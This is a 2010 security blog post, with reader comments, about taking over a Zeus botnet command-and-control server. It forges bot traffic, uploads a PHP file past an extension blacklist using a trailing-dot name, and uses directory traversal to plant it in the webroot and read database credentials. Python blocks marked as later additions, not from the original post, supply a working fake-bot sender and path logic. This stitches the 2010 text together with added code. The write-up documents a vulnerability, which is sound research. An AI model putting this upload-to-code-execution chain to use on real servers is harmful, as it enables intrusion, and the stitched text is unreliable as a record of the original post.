Monday, September 27th, 2010

Turning the Tables – Part I

Boom… I’ve just taken over a Zeus C&C.  I fire up a second, clean VM just to verify… yup it works.  Ok, now what?

A while back, I came across a kit for setting up a Zeus botnet.  It was an interesting package.  Looking at the C&C, the bot builder, the actual bot, and the user manual was pretty cool (yes, it comes with a user manual).  You have to admire some of the tricks used by the bot; these guys are clever.  I set up a mini-botnet on a testing network and began to examine how the botnet worked.  Eventually, I came across some bugs (even a blind squirrel finds a nut every once in a while).  There are some fascinating things to consider when finding bugs in software that is used primarily by criminals, but I won't bore you with that now.  Instead I'd like to share with you some of the more interesting parts of my research.

Before I proceed, there are a few things I’d like to state:

  1. This research was done on my own time on my own equipment.  The thoughts on my blog are my own.
  2. Disclosure of this issue is a bit tricky.  I’ll cover some of the issues I came across in a future post.
  3. I’m releasing the details of my work because I felt it was important for the public to have this knowledge to better defend their networks.
  4. All the work presented here is for academic and research purposes only.

In the spirit of responsible disclosure I contacted and informed them that I may have discovered a security issue with their C&C server software.  The team informed me that they were a cloud service provider and didn’t have C&C software. then proceeded to spam me with advertisements for their latest products.  I then contacted but received no response. then proceeded to spam me with Viagra ads and executables for me to download.  With no other alternative and an email inbox full of spam, I have no choice but to provide full disclosure of the vulnerability to the public.

Taking a look at the documentation that accompanies the Zeus package, the change log indicates that I'm working with a recent version of Zeus (likely released earlier this year).

Examining the source code from the C&C confirms that I’m working with version, which was released on January 15th of this year.

I haven’t tested this exploit against newer versions of the C&C, but this post should provide everything you need to check yourself.  If you do happen to have a newer version of the C&C code (or kits from other botnets), please contact me (xssniper  -at- gmail) I’d love to have a look.  I looked on the Internetz to see if someone else had discovered this, but I found nothing.  If this bug was previously disclosed and I failed to credit you, please let me know (I don’t follow the bot scene very closely).

The C&C software is a PHP based web application that provides a control panel for botmasters and also serves as the gateway for bot communication.  Several websites have described the C&C, so I won't spend much time on that here, but a few things are worth touching on.  When the C&C web application is installed, very little attack surface is exposed to unauthenticated users.  The two most interesting pages available to unauthenticated users are the login page and the gateway.  By default, the login page is located at /cp.php and the gateway at /gate.php.  Some botmasters rename gate.php, but if you've managed to capture a live Zeus bot it will phone home to whatever the gateway is called, so the name is easy to recover.  For clarity, let's assume the gateway is at /gate.php (the default).  The gateway only responds to requests that look like they came from a bot; if you point your browser at /gate.php, you get a blank page back.

Luckily, we have both bot samples and the source for the C&C, allowing us to reverse the protocol needed for communication to the gateway.  Let’s walk through a couple key pieces of the gate.php source.  First, the gateway requires a POST request.

if(@$_SERVER['REQUEST_METHOD'] !== 'POST')die();



If the gateway receives a POST request, it grabs the POST body, performs some basic validation, and then decrypts the data using the RC4 algorithm.

$data      = @file_get_contents('php://input');   // raw POST body, no form parameters
$data_size = @strlen($data);
if($data_size < HEADER_SIZE + ITEM_HEADER_SIZE)die();   // must hold at least a header and one item
$data = RC4($data, BOTNET_CRYPTKEY);               // symmetric key shared with every bot

This is not a typical POST request with POST parameters in the body.  Instead, this POST request contains a binary blob as its POST body (there are no POST parameter names).  The last line in the code snippet provided above mentions RC4 and a PHP constant named BOTNET_CRYPTKEY.  In case you’re wondering, the RC4 key (BOTNET_CRYPTKEY) is set by the botmaster when setting up the C&C and is stored server side (in the /system/config.php file).  As RC4 is a symmetric algorithm, the bot must also have a representation of the key.  The key is embedded into the bot (supplied via configuration file).  So once you have captured a live bot, you’ll be able to extract the RC4 key.  The key can be extracted from memory or if you are able to decrypt the config.bin file, you’ll see the key passed as part of the configuration for the bot.  If you’re interested in doing this, check out  Worst case, you can try brute forcing the key.

Once the data is decrypted, the gateway does a quick sanity check.

if(strcmp(md5(substr($data, HEADER_SIZE), true), substr($data, HEADER_MD5, 16)) !== 0)die();

and proceeds to unpack the data if the sanity check turns out ok

$list = array();
for($i = HEADER_SIZE; $i < $data_size;)
{
  // each item: 16-byte header of four uint32 (id, flags, size, real size), then 'size' bytes of data
  $k = @unpack('L4', @substr($data, $i, ITEM_HEADER_SIZE));
  $list[$k[1]] = @substr($data, $i + ITEM_HEADER_SIZE, $k[3]);
  $i += (ITEM_HEADER_SIZE + $k[3]);
}



Once the data is unpacked, we will have an array ($list[]) populated with various configuration and log data being passed from the bot to the C&C.  Using what we’ve discovered thus far, we can create a fake bot that is capable of communicating with the C&C.  Depending on the values held in the $list array, the gateway executes various functions.  One of the functions I found interesting was this:
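To make the protocol concrete, here is a fake bot that builds a message the way gate.php expects and a parser that applies gate.php's own checks to it.  This is an added example, not code from the original post or from the Zeus kit.  gate.php names the constants HEADER_SIZE, HEADER_MD5 and ITEM_HEADER_SIZE but their values are not shown above, so the numbers below are assumptions for the example; take the real ones, and the numeric SBCID_* item ids, from your copy of the C&C source.

```python
"""Fake-bot message builder and gate.php-style parser.

Added example (not code from the post or the Zeus kit).  It mirrors the
gate.php logic quoted above: a fixed-size header carrying an MD5 of
everything after it, then a run of items, each a 16-byte 'L4' header
(id, flags, size, real size as little-endian uint32) followed by 'size'
bytes of data, with the whole blob RC4'd under BOTNET_CRYPTKEY.  The
header constants below are assumptions; the SBCID_* ids are not on the
page either, so the demo uses arbitrary ids.
"""
import hashlib
import struct
import urllib.request

HEADER_SIZE = 48       # assumed total header length
HEADER_MD5 = 32        # assumed offset of the 16-byte MD5 inside the header
ITEM_HEADER_SIZE = 16  # four uint32 fields, PHP unpack('L4')


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR; encryption and decryption are the same call."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_bot_message(key: bytes, items: dict) -> bytes:
    """Pack {item_id: payload} as a bot would before POSTing it to the gateway."""
    body = b"".join(
        struct.pack("<LLLL", item_id, 0, len(payload), len(payload)) + payload
        for item_id, payload in items.items()
    )
    header = bytearray(HEADER_SIZE)
    # gate.php compares md5(substr($data, HEADER_SIZE)) with the 16 bytes at HEADER_MD5
    header[HEADER_MD5:HEADER_MD5 + 16] = hashlib.md5(body).digest()
    return rc4(key, bytes(header) + body)


def parse_gate_message(key: bytes, blob: bytes):
    """Mirror of gate.php's checks: returns the $list dict, or None where it die()s."""
    if len(blob) < HEADER_SIZE + ITEM_HEADER_SIZE:
        return None
    data = rc4(key, blob)
    if hashlib.md5(data[HEADER_SIZE:]).digest() != data[HEADER_MD5:HEADER_MD5 + 16]:
        return None
    items = {}
    i = HEADER_SIZE
    while i + ITEM_HEADER_SIZE <= len(data):
        item_id, _flags, size, _real_size = struct.unpack(
            "<LLLL", data[i:i + ITEM_HEADER_SIZE])
        items[item_id] = data[i + ITEM_HEADER_SIZE:i + ITEM_HEADER_SIZE + size]
        i += ITEM_HEADER_SIZE + size
    return items


def post_to_gateway(gate_url: str, key: bytes, items: dict) -> bytes:
    """Send the packed blob as a raw POST body (no form parameters), as the bot does.
    gate_url is whatever the captured bot phones home to; not exercised offline."""
    req = urllib.request.Request(gate_url, data=build_bot_message(key, items),
                                 method="POST")
    with urllib.request.urlopen(req) as resp:
        return resp.read()


def demo() -> bool:
    """Round trip with a constructed key and two constructed items."""
    key = b"example-botnet-key"      # constructed; the real key comes from the bot
    items = {1: b"constructed log data", 2: struct.pack("<L", 2)}
    blob = build_bot_message(key, items)
    return parse_gate_message(key, blob) == items
```

Two things fall out of writing this.  First, the gateway's only integrity check is an unkeyed MD5 over the item area: it catches corruption and a wrong RC4 key, but anyone holding the key can forge any message, and header bytes outside the digest field are not covered at all.  Second, because RC4 is a stream cipher, flipping one ciphertext bit flips exactly one plaintext bit, which is what makes the MD5 the only thing standing between a tampered blob and the unpack loop.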

else if(!empty($list[SBCID_BOTLOG]) && !empty($list[SBCID_BOTLOG_TYPE]))
{
  $type = ToInt($list[SBCID_BOTLOG_TYPE]);

  if($type == BLT_FILE)
  {
    // Extensions that would allow remote execution.
    $bad_exts = array('.php3', '.php4', '.php5', '.php', '.asp', '.aspx', '.exe', '.pl', '.cgi', '.cmd', '.bat', '.phtml');
    $fd_hash  = 0;
    $fd_size  = strlen($list[SBCID_BOTLOG]);

    // Build the file name.
    if(IsHackNameForPath($bot_id) || IsHackNameForPath($botnet))die();
    $file_root = REPORTS_PATH.'/files/'.urlencode($botnet).'/'.urlencode($bot_id);
    $file_path = $file_root;
    $last_name = '';

    // The bot-supplied destination path is split on '/' and each piece is urlencode()d.
    $l = explode('/', (isset($list[SBCID_PATH_DEST]) && strlen($list[SBCID_PATH_DEST]) > 0 ? str_replace('\\', '/', $list[SBCID_PATH_DEST]) : 'unknown'));
    foreach($l as &$k)
    {
      $file_path .= '/'.($last_name = urlencode($k));
    }
    if(strlen($last_name) === 0)$file_path .= '/unknown.dat';

    // Check the extension and fix up the file name.
    if(($ext = strrchr($last_name, '.')) === false || in_array(strtolower($ext), $bad_exts) !== false)$file_path .= '.dat';
    $ext_pos = strrpos($file_path, '.');

    //FIXME: if the name is too long.
    if(strlen($file_path) > 180)$file_path = $file_root.'/longname.dat';

    // Add the file.
    for($i = 0; $i < 9999; $i++)
    {
      if($i == 0)$f = $file_path;
      else $f = substr_replace($file_path, '('.$i.').', $ext_pos, 1);

      // Take the first free name, or reuse one that already holds identical content.
      if(!file_exists($f))break;
      if($fd_size == filesize($f))
      {
        if($fd_hash === 0)$fd_hash = md5($list[SBCID_BOTLOG], true);
        if(strcmp(md5_file($f, true), $fd_hash) === 0)break;
      }
    }

    if(!CreateDir(dirname($file_path)) || !($h = fopen($f, 'wb')))die();
    flock($h, LOCK_EX);
    fwrite($h, $list[SBCID_BOTLOG]);
    flock($h, LOCK_UN);
  }
}






A quick look at the function above shows that if $list[SBCID_BOTLOG] and $list[SBCID_BOTLOG_TYPE] are set to the right values, we can trick the C&C into thinking we have a bot that needs to upload a log file.  Before the C&C accepts our supplied log file, it attempts some validation: it checks whether the extension of the file name we supply is in a blacklist of "bad extensions", and it runs the botnet name and bot ID through IsHackNameForPath (a custom validation routine written by the C&C author).  Note what is not checked: the bot-supplied destination path in $list[SBCID_PATH_DEST] never goes through IsHackNameForPath; it is only split on '/' and urlencode()d piece by piece.

$bad_exts = array('.php3', '.php4', '.php5', '.php', '.asp', '.aspx', '.exe', '.pl', '.cgi', '.cmd', '.bat', '.phtml');

if(($ext = strrchr($last_name, '.')) === false || in_array(strtolower($ext), $bad_exts) !== false)$file_path .= '.dat';

// Build the file name.
if(IsHackNameForPath($bot_id) || IsHackNameForPath($botnet))die();

We know the web server supports PHP because the C&C management console is written in PHP.  If we can pass ourselves off as a bot, convince the C&C that we have a "BOTLOG" to upload, and hand it a file containing our own PHP instead of a log, we have arbitrary code execution on the C&C.  It seems the C&C code protects against exactly this attack... or does it?  Unfortunately for the botmaster, the blacklist only sees the string the bot supplies, while what decides whether a file is executed as PHP is the web server's handler mapping and the filesystem's naming rules.  Some examples of the quirky extension madness associated with PHP can be found on slide 23 in this presentation (given by Kuza55 at CCC 2007).  In this case, I want the upload to work on both IIS and Apache (the platforms the C&C supports), so I use the trailing dot trick.  All I have to do is append a period after the .php extension (.php.): strrchr() then returns "." as the extension, which is not in $bad_exts, so no ".dat" is appended.  On Windows the trailing dot is stripped when the file is created, so pwnd.php. lands on disk as pwnd.php, and Apache's usual AddHandler/AddType mapping treats .php as a matching extension even when it is not the last one, so the file contents still run through the PHP interpreter.  Once the extension check is bypassed, the value I supplied for $list[SBCID_BOTLOG] is written as the contents of the file I named.  Now I just have to work out where my PHP file was written.  This line of PHP in the gateway source gives us a clue.

$file_root = REPORTS_PATH.’/files/’.urlencode($botnet).’/’.urlencode($bot_id);

The default location for the BOT LOG is: C&C-webroot\_reports\files\<Name of the botnet>\<Bot ID>\

I also control (via values passed from my fake bot to the C&C) the two subdirectory names (in this example: “BKs_BOTNET” for <Name of the botnet> and “BK_PWNZ_UR_CnC” for <Bot ID>).  If the botmaster is using a default install and hasn’t relocated the _reports folder, we should be able to simply guess where our PHP file was written to (/_reports/files/BKs_BOTNET/BK_PWNZ_UR_CnC/pwnd.php).

If the botmaster was smart and relocated the _reports folder, guessing where the uploaded PHP file landed becomes harder.  We can take the guesswork out with directory traversal: the destination path we supply in SBCID_PATH_DEST is split on '/', each piece is urlencode()d, and urlencode leaves ".." untouched, so the pieces are appended to $file_root verbatim and the PHP file can be planted directly in the webroot.
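The two weaknesses just described (the extension blacklist and the unchecked destination path) are easiest to see by running the gateway's own path logic on a few inputs.  The block below is an added example, not code from the original post or from the Zeus kit: gate_file_path() is a Python port of the $file_path construction quoted above, where_it_lands() collapses the ".." segments as the operating system will, and safe_report_path() is the check a defender would want instead.  REPORTS_PATH is assumed to be _reports under the webroot, and the botnet name and bot ID strings are constructed for the example.

```python
"""Where a BLT_FILE upload lands on the C&C, and why the blacklist fails.

Added example (not code from the post or the Zeus kit).  gate_file_path()
ports the gate.php logic quoted above: split SBCID_PATH_DEST on '/',
urlencode each segment, blacklist the last segment's extension, append
'.dat' on failure, fall back to longname.dat past 180 characters.
safe_report_path() shows the hardened alternative.  REPORTS_PATH is
assumed to be '_reports' relative to the webroot.
"""
import posixpath
import re
from urllib.parse import quote_plus

BAD_EXTS = {".php3", ".php4", ".php5", ".php", ".asp", ".aspx",
            ".exe", ".pl", ".cgi", ".cmd", ".bat", ".phtml"}


def php_urlencode(s: str) -> str:
    """PHP urlencode(): letters, digits and -_. untouched, space becomes '+'.
    (Python also leaves '~' alone where PHP emits %7E; irrelevant here.)
    The point that matters: '.' and therefore '..' pass through unchanged."""
    return quote_plus(s, safe="")


def gate_file_path(botnet: str, bot_id: str, path_dest: str,
                   reports_path: str = "_reports") -> str:
    """Port of the gate.php path logic.  Note: no IsHackNameForPath() on path_dest."""
    file_root = f"{reports_path}/files/{php_urlencode(botnet)}/{php_urlencode(bot_id)}"
    file_path = file_root
    last_name = ""
    dest = path_dest.replace("\\", "/") if path_dest else "unknown"
    for segment in dest.split("/"):
        last_name = php_urlencode(segment)
        file_path += "/" + last_name
    if last_name == "":
        file_path += "/unknown.dat"
    dot = last_name.rfind(".")                  # strrchr($last_name, '.')
    ext = last_name[dot:] if dot != -1 else None
    if ext is None or ext.lower() in BAD_EXTS:  # 'pwnd.php.' gives ext '.', not listed
        file_path += ".dat"
    if len(file_path) > 180:
        file_path = file_root + "/longname.dat"
    return file_path


def where_it_lands(file_path: str) -> str:
    """Collapse the '..' segments the gateway left in, as the OS will on open."""
    return posixpath.normpath(file_path)


def safe_report_path(botnet: str, bot_id: str, path_dest: str,
                     reports_path: str = "_reports"):
    """Hardened variant: allowlist the identifiers, keep only the final path
    component, drop trailing dots and spaces (Windows strips them on create),
    force a single inert extension and confirm the result stays under root."""
    ident = re.compile(r"[A-Za-z0-9_-]{1,64}")
    if not ident.fullmatch(botnet) or not ident.fullmatch(bot_id):
        return None
    name = path_dest.replace("\\", "/").rsplit("/", 1)[-1].rstrip(". ")
    base = re.sub(r"[^A-Za-z0-9_-]", "_", name.split(".")[0])[:64] or "unknown"
    root = posixpath.normpath(posixpath.join(reports_path, "files"))
    candidate = posixpath.normpath(
        posixpath.join(root, botnet, bot_id, base + ".dat"))
    return candidate if candidate.startswith(root + "/") else None
```

Running gate_file_path() with "pwnd.php" gives pwnd.php.dat, as the blacklist intends; with "pwnd.php." the ".dat" is never appended; and with "../../../../pwnd.php." the returned path normalises to pwnd.php. directly under the webroot, because every ".." survived urlencode.  The hardened version never uses the bot's directory components at all, which is the fix: a blacklist of extensions cannot be made complete across IIS, Apache and their filesystems, but an allowlisted base name with a forced extension inside a fixed directory can.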

Boom… we’ve just taken over a Zeus C&C.  Once we have our own PHP code running on the C&C, we can include the /system/config.php file.  Config.php contains the location of the MySQL database as well as the DB username and password (via connection string), giving us complete control over the management console and all the bots associated with this C&C.

For those interested in “studying” this vulnerability, I’ve put together a Proof of Concept.  All you have to do is provide the location of the gateway (provided by the bot), the RC4 key (provided by the bot), and the PHP code that you want to upload.

Posted by xssniper | Filed in Security, Tools

34 Responses to “Turning the Tables – Part I”

  1. September 27th, 2010 at 10:06 am

    pgl said:

    Interesting – looking forward to part 2!

  2. September 27th, 2010 at 12:20 pm

    myownremote said:

    yes! =) great work

  3. September 27th, 2010 at 2:08 pm

    Frank said:

    Great stuff!

    Available in Metasploit?

  4. September 27th, 2010 at 3:04 pm

    noncompoop said:


  5. September 27th, 2010 at 3:17 pm

    jbmoore said:

    Well, you’ve called this section Part I. I’m guessing Part Deux will be even more interesting. Have you talked to Brian Krebs about this little trick? He might be a useful resource. I can think of some others that could be helpful. Good work. I hate to see it get patched quickly by the bad guys. But since you’ve published it, it’s likely already been patched before you went public.

  6. September 27th, 2010 at 4:08 pm

    jbmoore said:

    Well, according to The Register it’s not easily patched. I guess we’ll see if your estimate holds. There is a great incentive though, for the authors to fix this oversight quickly.

  7. September 27th, 2010 at 7:56 pm

    Juan said:

    Nice blog!!! i liked this article. If i get some free time i’ll try your proof of concept, it seems interesting. Thanks!!!

  8. September 27th, 2010 at 8:17 pm

    Matt said:

    I just got home 2 people linked me here on msn. Amazing research, I already downloaded the slides of the presentation you mentioned, turns out there are a few things I did not know.

  9. September 27th, 2010 at 9:32 pm

    Tone said:

    very nice

  10. September 28th, 2010 at 6:01 am

    Daniel Molina said:

    Thanks for your nice work. Try to install some syntax highlighter for your code examples, like Google Syntax Highlighter, it will bring you a very good looking on your blog. I was copy/pasting code examples on my editor to take a clear look.

  11. September 28th, 2010 at 7:34 am

    Vlado said:

    Hello, thank you for these posts. We continue to refine and update ZeuS and fixing holes like these helps with better code and most quality is more buyers :)

    I also thank your ethic and not exploit my C&C. There is much western money to be made! :) :) :)

  12. September 28th, 2010 at 7:35 am

    The Italian Honey Project » Zeus ( botnets infiltration exploit said:

    […] The full blog post here. […]

  13. September 28th, 2010 at 9:18 am

    cyberbofh said:


    Waiting for part 2 :)

  14. September 28th, 2010 at 9:28 am

    SomeOnE said:

    nice reading, thx bill. somehow unnatural russian in comments, with a slightest error a russian will never make (-;


  15. September 28th, 2010 at 11:54 am

    Grab bag: Hacking and hacks (Jarrett House North) said:

    […] Billy (BK) Rios » Turning the Tables – Part I On how to exploit a weakness in the Zeus botnet command and control software and pwn it. (tags: security) […]

  16. September 28th, 2010 at 3:32 pm

    Vinicius K-Max said:

    Very nice post!
    Can’t wait for part 2.

  17. September 28th, 2010 at 7:09 pm

    OneSome said:

    “//Проверяем расширении, и указываем маску файла.”

    Yeah this one is both unnatural and has a couple of grammar issues.

    //FIXME: Если имя слишком большое.

    this one uses a wrong adjective ~ “big file name” instead of “long file name”

    So do you think Zeus is just a plot by the US govt to push the cyberwar thing through? :)

  18. September 30th, 2010 at 1:32 am

    Tom said:

    Great stuff :-)

  19. September 30th, 2010 at 4:17 pm

    YOU F'N MORON said:

    You NEVER should have "publicly" disclosed this vulnerability. There is a reason things of this nature SHOULD have been kept quiet.

    I know what you’re thinking in helping the security community, but…

  20. October 1st, 2010 at 1:11 am

    MaXe said:

    Very nice research, I liked it quite a lot! The detail of information is also very nice. I look forward to read more about your findings 😉

  21. October 1st, 2010 at 11:17 am

    test said:

    yes ,exploit ok with php admin but not easy for get RC4 key if have good trick

    thanks research

  22. October 1st, 2010 at 3:30 pm

    Dodge said:

    I suppose you're a pissed off ex (if I'm right) MS employee, otherwise you would not have posted this info. By explaining how you achieved your result, you've given the bot writers the ammo they need to put a patch in place, while on the other hand giving the authorities the info they need to take the bots down. You obviously want to see both sides going at it. There's more to you than meets the eye and it does not look pretty.

  23. October 3rd, 2010 at 10:18 pm

    Week 39 in Review – 2010 | Infosec Events said:

    […] Turning the Tables – Part I – Boom… I’ve just taken over a Zeus C&C.  I fire up a second, clean VM just to verify… yup it works. […]

  24. October 4th, 2010 at 2:35 am

    NetC said:

    Nice work.
    Know some security companies which have known this for a long time. But they just steal the information from the Zeus server and sell it off to banks.

    Who is now the criminal? The security firm or the Zeus bot-master?


  25. October 4th, 2010 at 9:49 pm

    Sri said:

    Billy, Awesome research – keep up the good work

  26. November 2nd, 2010 at 12:59 am

    Joe said:

    The extension “hole” has nothing to do with PHP. It is the web server configuration that determines whether to pass a request off to PHP or not. PHP has no concept of file extensions at all. If the web server says, “treat this file as a PHP script” then PHP will interpret it.

  27. December 13th, 2010 at 4:43 am

    Risky Business #170 — The week of Zeus! - 華人資安廣播 Information Security Voice Of Chinese said:

    […] in Japan. He’s grumpy! He’s not pleased! A security researcher in the USA published a nice big detailed blog post the other day in which he described some vulnerabilities he’d found in the Zeus botnet CC […]

  28. December 18th, 2010 at 7:10 pm

    Ben said:

    Really Interested in your work + you’ve got a good skill. Keep up the brilliant work + research mate!

  29. January 2nd, 2011 at 7:00 pm

    Dave51 said:

    Thoughts on Security in an Uncivilized World…Boom… I

  30. April 27th, 2012 at 7:53 am

    Bypass zeus panel ? said:

    […]…r-1097298.html…ng-the-tables/ http://ddanchev.Research…erable-to.html […]

  31. May 6th, 2014 at 11:52 am

    ste williams – Watch a bank-raiding ZeuS bot command post get owned in 60 seconds said:

    […] bots and their command server, and the URL to the server, and exploited a bug (that appears to be similar to this one) to own the control […]

  32. May 6th, 2014 at 9:16 pm

    ZeuS Bot Command Post Gets Owned In 60 Seconds | Cyber security labs by Cipher Net AB said:

    […] bots and their command server, and the URL to the server, and exploited a bug (that appears to be similar to this one) to own the control […]

  33. August 11th, 2014 at 10:40 am

    How to bypass Zeus Trojan’s self protection mechanism | said:

    […] in some versions of Zeus ( as well as Zeus lite, KINS,ICE-IX) As described in detail here ( . Our good friend Xylitol has already provided a ready to use tool to exploit such vulnerability […]

  34. April 7th, 2015 at 7:37 am

    embossitworld said:

    friend Xylitol has already provided a ready to use tool to exploit such vulnerabilit
